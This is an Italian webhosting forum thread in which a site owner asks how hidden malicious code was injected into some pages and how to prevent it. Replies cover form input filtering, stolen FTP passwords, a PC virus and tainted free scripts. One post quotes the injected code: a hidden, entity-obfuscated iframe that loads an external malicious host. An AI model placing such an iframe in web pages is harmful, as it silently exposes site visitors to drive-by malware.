Benvenuto nella nostra community, registra un account gratuito ADESSO!
Oltre 7000 persone hanno già registrato il loro account. Chiedi aiuto, conversa con aziende ed esperti del settore webhosting italiano.
Iscriviti subito! In meno di 2 minuti!




Risultati da 1 a 9 di 9
  1. #1
    Nuovo utente
    Data Registrazione
    Sep 2008
    Località
    Milano
    Messaggi
    11

    Proteggersi da un code injection (credo)

    [Premessa: sperando di aver scelto il forum giusto e la sezione appropriata..]

    Ciao, settimana scorsa qualcuno mi ha inserito in alcune pagine html e php contenenti un form, un iframe con richiamo ad un codice malefico, come potersi proteggere? come può essere accaduto?

    Il servere è linux di aruba..

    Grazie a tutti!!!



  2. #2
    Webhosting evangelist L'avatar di TheDarkITA
    Data Registrazione
    Nov 2007
    Località
    Messina
    Messaggi
    536

    Re: Proteggersi da un code injection (credo)

    I tuoi script sono aggiornati?

  3. #3
    Uno
    Uno non è collegato
    Utente Moderatore
    Data Registrazione
    Mar 2008
    Messaggi
    5,792

    Re: Proteggersi da un code injection (credo)

    Un form dovrebbe anche nella versione 0.001 avere un filtro, una maschera di immissione che impedisce l'uso di tutto quello che non è richiesto o in caso che almeno lo entitizzi se il form deve poter contenere anche codice e/o caratteri diversi dai normali alfanumerici.

    Se non si conosce un pelo di php o altri linguaggi di scripting lato server bisognerebbe evitare di mettere su form presi in giro (tutta la comunità informatica online sarebbe grata). Se invece erano compresi in un cms allora sarebbe meglio stare alla larga da quel cms

    Dopo la premessa, il codice era realmente malefico o era appunto entitizzato e quindi solo un tentativo andato a male?

    Prima che mi chiedi che significa entitizzato

    Codice PHP:
    <?php echo "ciao mondo" ?>
    questo sopra è entitizzato, il codice c'è ma non ha valore, non funziona detto in parole povere

  4. #4
    Nuovo utente
    Data Registrazione
    Sep 2008
    Località
    Milano
    Messaggi
    11

    Re: Proteggersi da un code injection (credo)

    Ciao, il codice inserito a fondo pagina per l'esattezza prima del tag di chiusura </body> era questo
    Codice:
    <iframe src="http://jL.ch&#117;ra.pl&#47;rc/" style="d&#105;splay:none"></iframe>
    Lo script del form è quello generato da un form generator trovato online.

    Detto questo, possono essere entrati dal form in qualche modo?
    O potrebbero aver trovato la password ftp?

    I file corrotti su varie centinaia erano solo 4..

    Grazie.

  5. #5
    Webhosting evangelist L'avatar di TheDarkITA
    Data Registrazione
    Nov 2007
    Località
    Messina
    Messaggi
    536

    Re: Proteggersi da un code injection (credo)

    Senza sapere il sorgente del form, è impossibile risponderti.

  6. #6
    Nuovo utente
    Data Registrazione
    Sep 2008
    Località
    Milano
    Messaggi
    11

    Re: Proteggersi da un code injection (credo)

    Forse risolto, ho analizzato e cercato il codice inserito, e leggo che è un virus nel pc che genera queste stringhe in vari casi.. su vari file, e poi quando li carichi online.. trac!! quindi grazie del supporto, ed ora lascio la palla a chi ha realizzato quella pagina.

    Buona serata a tutti.

  7. #7
    Uno
    Uno non è collegato
    Utente Moderatore
    Data Registrazione
    Mar 2008
    Messaggi
    5,792

    Re: Proteggersi da un code injection (credo)

    Citazione Originariamente Scritto da grollaz Visualizza Messaggio
    Lo script del form è quello generato da un form generator trovato online.
    guarda che non sia questo il problema, nascondono porcherie in parecchie risorse gratuite purtroppo, per farti un esempio ci sono template gratuiti di wordpress che se va bene hanno nascosti una sfilza di link a siti poco seri, se va male.....

  8. #8
    Webhosting evangelist
    Data Registrazione
    Jun 2007
    Messaggi
    524

    Re: Proteggersi da un code injection (credo)

    Citazione Originariamente Scritto da grollaz Visualizza Messaggio
    Detto questo, possono essere entrati dal form in qualche modo?
    O potrebbero aver trovato la password ftp?
    In genere agiscono tramite ftp, controlla la tua macchina.

  9. #9
    ale
    ale non è collegato
    Webbologo L'avatar di ale
    Data Registrazione
    Jun 2009
    Località
    Vienna
    Messaggi
    169

    Riferimento: Proteggersi da un code injection (credo)

    Senza sapere che software è installato è impossibile dire di più. Può darsi tutto, da un form che non verifica per HTML tags (il classico htmlentities o htmlspecialchars in PHP) fino a puro accesso sul shell.

Discussioni Simili

  1. Creazione DNS server (credo...)
    Di lady R nel forum VPS - Virtual Private Server
    Risposte: 23
    Ultimo Messaggio: 22-08-2011, 08:45
  2. SQL Injection, come proteggersi - HostingSolutions.it
    Di Redazione HostingTalk nel forum Hosting Provider accreditati HostingTalk.it. Comunicati e News
    Risposte: 0
    Ultimo Messaggio: 07-04-2011, 09:00
  3. RackSpace: 150 milioni di prestito per proteggersi dalla flessione dei mercati
    Di Redazione HostingTalk nel forum Articoli e news su Webhosting e Servizi Internet
    Risposte: 0
    Ultimo Messaggio: 14-10-2008, 06:33
  4. epp code o auth code
    Di pluto nel forum Domini e Registrazioni
    Risposte: 2
    Ultimo Messaggio: 11-05-2007, 09:18

Informazioni Discussione

Utenti che Stanno Visualizzando Questa Discussione

Ci sono attualmente 1 utenti che stanno visualizzando questa discussione. (0 utenti e 1 ospiti)

Tag per Questa Discussione

Segnalibri

Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •